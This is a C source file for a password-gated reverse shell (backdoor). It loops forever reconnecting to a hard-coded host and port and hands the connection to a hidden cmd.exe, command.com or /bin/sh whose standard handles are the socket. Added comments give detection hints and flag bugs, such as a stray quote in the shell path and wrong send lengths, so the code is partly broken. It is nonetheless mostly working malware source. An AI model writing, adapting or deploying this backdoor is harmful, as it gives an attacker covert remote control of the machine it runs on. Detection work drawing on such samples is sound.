/*
 * Connect-back ("reverse") shell with a single hard-coded password gate.
 *
 * Behaviour as written: main() loops forever, probes the global socket and,
 * whenever the probe fails, calls ReverseShell() to dial out to the
 * hard-coded host/port, asks the remote end for the password (Loggea()) and
 * then hands the connection to a command interpreter whose standard handles
 * are the socket itself.
 *
 * Defender notes (everything below is visible in this listing):
 *  - the password, the host name, the port and the prompt strings are
 *    string/integer literals, so they sit in cleartext in the built binary;
 *  - on Windows the spawned cmd.exe / command.com has STARTF_USESTDHANDLES
 *    with all three std handles set to a socket; on POSIX the child has
 *    fd 0/1/2 dup2()'d onto a TCP socket before exec -- both are strong
 *    process-tree / handle-inspection signals;
 *  - the process keeps a persistent outbound TCP connection and reconnects
 *    after a fixed sleep.
 */
#include <stdio.h>
#include <string.h>
// headers and libraries selected per OS
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#else
#include <netdb.h>
#include <sys/socket.h>
#define SOCKET_ERROR -1
#endif
#define PASSWORD "mi_pass\0" // password (string literal; compared with strcmp, so the trailing \0 is just the terminator)
char Buffer[1024]; // buffer used to send/receive data
int Recv; // number of bytes returned by the last recv()
int sock; // static storage, so it is 0 until ReverseShell() first assigns a socket
int ReverseShell(char *Destino, short Puerto,char *pwd);
/*
 * Entry point: reconnect loop.
 * Each pass sends a zero-length datagram on `sock`; a non-positive result is
 * treated as "not connected", the old socket is released and a new
 * connect-back to localhost:4664 is attempted.  On the very first pass
 * `sock` is still 0.
 * The wait between probes differs per platform: Sleep(100) is milliseconds
 * on Windows, sleep(100) is seconds on POSIX.
 */
int main()
{
  for(;;)
  {
    if(send(sock,"",0,0)<=0)
    {
#ifdef WIN32
      WSACleanup();
#else
      close(sock);
#endif
      ReverseShell("localhost",4664,PASSWORD);
    }
#ifdef WIN32
    Sleep(100);
#else
    sleep(100);
#endif
  }
  return 0;
}
/*
 * Open a TCP connection to Destino:Puerto, run the password check, then bind
 * a command interpreter to the connection.
 *
 * Destino: host name resolved with gethostbyname() (result not checked for NULL)
 * Puerto:  TCP port, converted with htons()
 * pwd:     not used; Loggea() compares against the PASSWORD macro directly
 *
 * Returns 0 on any socket/connect/password failure and from the POSIX parent
 * after fork().  Note that the Windows branch returns 1 when CreateProcess()
 * fails and 0 (after WSACleanup()) when it succeeds.
 */
int ReverseShell(char *Destino, short Puerto, char *pwd)
{
  int Loggea();
  struct hostent *Master;
  struct sockaddr_in Winsock_In;
  // on Windows the socket library must be initialised first
#ifdef WIN32
  STARTUPINFO start_proc;
  PROCESS_INFORMATION info_proc;
  OSVERSIONINFO SOinfo;
  WSADATA wsaData;
  char *shell;
  // initialise Winsock so a socket can be created
  WSAStartup(MAKEWORD(2,2),/* requested Winsock version */ &wsaData /* receives the implementation details */);
  if((sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL))==INVALID_SOCKET) return 0;
#else
  if((sock=socket(AF_INET,SOCK_STREAM,0))==SOCKET_ERROR) return 0;
#endif
  // NOTE(review): Master is dereferenced below without a NULL check
  Master=gethostbyname(Destino);
  Winsock_In.sin_family=AF_INET; // IPv4
  Winsock_In.sin_port=htons(Puerto); // port to connect to
  Winsock_In.sin_addr= *((struct in_addr *) Master->h_addr); // host to connect to
#ifdef WIN32
  if(WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) return 0;
#else
  // NOTE(review): the cast names `struct sock_addr` as written; sizeof(struct sockaddr) is passed as the length
  if(connect(sock,(struct sock_addr *)&Winsock_In,sizeof(struct sockaddr))==SOCKET_ERROR) return 0;
#endif
  // password gate: Loggea() only returns once the remote side has sent PASSWORD
  if(Loggea()==0) return 0;
#ifdef WIN32
  // fill in the STARTUPINFO: hidden window, std handles redirected to the socket
  memset(&start_proc,0,sizeof(start_proc));// zero it first
  start_proc.cb=sizeof(start_proc);
  start_proc.dwFlags=STARTF_USESTDHANDLES;
  start_proc.wShowWindow=SW_HIDE;
  start_proc.hStdInput=(HANDLE)sock;
  start_proc.hStdOutput=(HANDLE)sock;
  start_proc.hStdError=(HANDLE)sock;
  // NOTE(review): SOinfo.dwOSVersionInfoSize is not set before GetVersionEx()
  GetVersionEx(&SOinfo);
  // pick the interpreter by platform id (Win9x family vs NT family)
  if(SOinfo.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS) { shell="command.com\0"; } else { shell="cmd.exe\0"; }
  // spawn the interpreter with handle inheritance enabled (bInheritHandles=TRUE)
  if(CreateProcess(NULL,shell,NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0) { return 1; } else { WSACleanup(); return 0; }
#else
  // parent: drop its copy of the socket and report 0; the child continues
  if(fork()!=0) { close(sock); return 0; }
  // child: duplicate the socket onto stdin, stdout and stderr
  dup2(sock,0); dup2(sock,1); dup2(sock,2);
  // replace the child image with the interpreter at the literal path below; execl only returns on failure
  if(!execl("/bin/sh'","sh",NULL)) { close(sock); return 0; }
#endif
  return 1;
}
/*
 * Password prompt over the connected socket.
 * Returns 0 (wrong / connection closed) or 1 (accepted).
 *
 * Loops: prompt, recv() up to 1024 bytes into Buffer, replace the last
 * received byte with '\0' (intended to strip the newline), compare with
 * PASSWORD; repeats until they match.  A non-positive recv() result
 * ends the function with 0.
 *
 * NOTE(review):
 *  - `PASSWORD!=NULL` compares a string literal with NULL, so it is always true;
 *  - the memset clears only sizeof(char*) bytes of Buffer, not the whole array;
 *  - the prompt and the acceptance message are sent with lengths computed from
 *    literals that differ from the data pointer passed to send();
 *  - there is no attempt limit, so the prompt repeats indefinitely.
 */
int Loggea()
{
  if(PASSWORD!=NULL)
  {
    do
    {
      // clear the buffer (only sizeof(char*) bytes, see note above)
      memset(Buffer,0,sizeof(char*));
      // ask for the password
      send(sock,"\n[#] Introduce la password: ",strlen("\n[#]Introduce la password: "),0);
      // receive the reply
      Recv=recv(sock,Buffer,1024,0);
      // check whether the peer closed the connection
      if(Recv<=0) return 0;
      Buffer[Recv-1]='\0';
    } while(strcmp(Buffer,PASSWORD)!=0);
    send(sock,"[#]Aceptada!\n\n",strlen("[#]Aceptada!\n\n)"),0);
  }
  return 1;
}